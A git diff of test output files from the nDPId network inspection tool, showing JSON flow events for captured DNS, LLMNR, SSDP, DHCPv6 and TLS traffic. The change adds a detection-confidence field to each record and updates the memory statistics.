+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104373025,"flow_last_seen":1470104373127,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408458,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":180000,"flow_min_l4_payload_len":440,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":7801,"flow_avg_l4_payload_len":487,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104377720,"flow_last_seen":1470104377820,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104373025,"flow_last_seen":1470104373127,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408458,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":180000,"flow_min_l4_payload_len":440,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":7801,"flow_avg_l4_payload_len":487,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104377720,"flow_last_seen":1470104377820,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":180000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":7929,"flow_avg_l4_payload_len":495,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":180000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":7929,"flow_avg_l4_payload_len":495,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","total-events-serialized":694}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1439/1439
@@ -700,9 +700,9 @@
 ~~ total active/idle flows...: 129/129
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4863025 bytes
-~~ total memory freed........: 4863025 bytes
-~~ total allocations/frees...: 101454/101454
+~~ total memory allocated....: 4905658 bytes
+~~ total memory freed........: 4905658 bytes
+~~ total allocations/frees...: 103044/103044
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 2437 chars
diff --git a/test/results/443-chrome.pcap.out b/test/results/443-chrome.pcap.out
index c836b9925..6d48416fe 100644
--- a/test/results/443-chrome.pcap.out
+++ b/test/results/443-chrome.pcap.out
@@ -1,7 +1,7 @@
 00442{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-chrome.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":1581109434258,"pkt":"KDc3AG3IEBMx8Tl2CABFAAXUL9xAADQG19GyPsWCwKgBDQG7z0OMwKr+Oj0RjoAQAfVXrQAAAQEICiUvy0seKwePAbBkhQkGDSwXAwMFJB7ULkZYT314CXk9r8PlYJygP344H6B+ItT1QydBOUTT\/6D31GPVzKtOQjSVxhbT8njy8fnLCF03csGz4\/Y1RkgUVmI84ERVBP7zbdzqFVMxHmkRU4146\/GYpGt09JudxRaBFBE6RH99GaIPOIBgIxL+lVzyEaqTle8b2ooKlmYXANwIghY6MzW7vfR0m2NAd4\/mImO8\/LyUCeGK0r\/puyNRW7lwQQMAmHKJdbXl9VyEWyHoVGg2V7UztPOOS9FaOf7PI0qXcHmQjpNhC3tUdKXBoA5lr9L4gV9TtzI0jsGqvB9N6GFz+qcMvQNu9oMflyIYBhNXeC+wMS3iHkbmb6YjZ1BITgZEep9Fizk45i3xCMymSmOsda0ujEX4jtgvxVvAdOobavQSODmvW7nF0r5t9e88tMuzTz7+vTqoOaJn4Q5qSGioRtcVHnLq2LNPOuGgbZaLvf8nOa3F\/fTzsfVgOnrof2PK7x6zJRR4iLtFUyiyV0abVTIHELfIYnSCf71pFYSlMWF1kbosbMAxw+8gDHb28maLs7wPXvpNMwUQmC5zWPLwG8e+Pf\/3nur0wrn5EOul2L1tr2PBCGM7nQJnzz+Ftab4qAnCKKMUrufRAVhXA6Ue6CMSRLYliOxzGRgmHVxorbbpx87m7XMCx1xGrv\/+sMpgjOYFPN80vjeb9Ar4xkocVQgWuuKpaWdNDznMzFzG0+H1ekKy8mE\/Y4uj8aty0rTxx\/RK0gYF2CUtsmGNskEzCWUbq5MAqcp05SHkAJHGGJeLVJYaWPvGXbFa5QHn9poomy6DBa+Zu\/J+olJwYCoT+frN77wk+XmgZEGX8LeovmjP4s1R+UbEFUsUMksh6m15XB\/oDSc43HBC0ZN2fBl+EVSpfPjbG\/eOyIfLCt5fbBfnhNgvommX5LE+2Hk1er+ly1V3Bk3SksoPHjYC3atFWwOW8i0ksy3cnSr3r7urFNldk3MU3+jnEXfTimw+aCW1vRMowhmfm8PlgjcufRfy+KbXvWvcglQ5SIZzkHbMTgRIVTH0rnzAvQa5V3qwPK10Uoz7qDIouhn\/mb\/ZISHF6mBR\/IXvmgdDxCQjDF0pzdpHGlijQnscX9IYmuALydf\/N95pDI1Ksot3SwlV+ToeoAcOu03ffeX9ZWtpGReoSSLBreVK2S9eOKb7ts0O5zIIo7KsqQiv\/vBgScz8WXOWpxQ\/yJVR5ay52w6EYcainLIU7Xbc\/tjzrhulig3U\/8LJroIUx7FTN+1M\/XXQgxU1xPwXfZVd2BCyLjPf3LnCxXwnRvsKpAN+jMhuodhLSF7CgHqc20YiiLhRoKoX9HTNFjjp4NCVuyybqoR14grCEsHZOU2qhA+8BZe5VlL7unSunUXcr1PeN9gM5Jq4MVqPdpyzDhvJpSxU3Hx+L1u56H6J0VrRo\/R6fO225uB9ZADFU\/E9+rLvS3XjVihQI4Xj3oV8Yz2DHOUB7myCSIfri88nrYevcoAQbwAgIH3ZuvMVV+F7spgWZOgjijLQs9AFYfhIg77XK7GhiJW4kT1GNIqN\/59u+gIdPmDuGurVucPbruilLRCDIsr+53Us+irmCwo\/E2YPbk4a0f3NX0k+rNo92g1D9wTfG3QFRXLoBVDcr2q9BeW0PVJsavNUQM+jFbQkjfp93AvyPnmEBcWXIT002jYiClr1Y1\/emkCZ90t5YN1lLX5fUvWWgwvQ8NqFZ2zWMZciPkbKDA3g3Y+AskVzW3FFBLqR77\/aXs+9FwMDBSQUQnjU3ptBoEOyx5s5g6C1C+gxkfWLgzLDV66R77tBk395nAfOwKbaxf02lWN9Kl7ER9qk1HP5doNJPo83hbomHGy3aIU4qtqfnGI\/DWje6wuZoh6zDMTlo3NI6IL\/slMBsWm6kBIHkYOp"}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
